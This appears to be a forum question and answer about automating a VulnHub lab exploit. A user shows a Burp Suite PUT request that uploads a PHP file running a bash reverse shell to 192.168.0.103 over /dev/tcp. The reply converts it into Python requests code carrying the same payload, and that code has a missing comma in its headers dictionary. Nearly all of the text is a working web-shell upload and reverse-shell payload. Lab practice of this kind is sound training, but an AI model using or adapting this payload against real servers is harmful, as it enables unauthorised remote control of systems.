Exploited vulnhub vm now want to automate exploitation process. I have burp suite request which gives me reverse shell, how send the exactly same request using python's requests library?
PUT /test/revshell.php HTTP/1.1
Host: 192.168.0.105
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 75
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.103/443 0>&1'");
I would recommend doing something like this:
import requests
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Connection": "close"
"Upgrade-Insecure-Requests": "1",
}
data = """<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.103/443 0>&1'");
"""
requests.put("http://192.168.0.105/test/revshell.php", headers=headers, data=data)
hope this helps!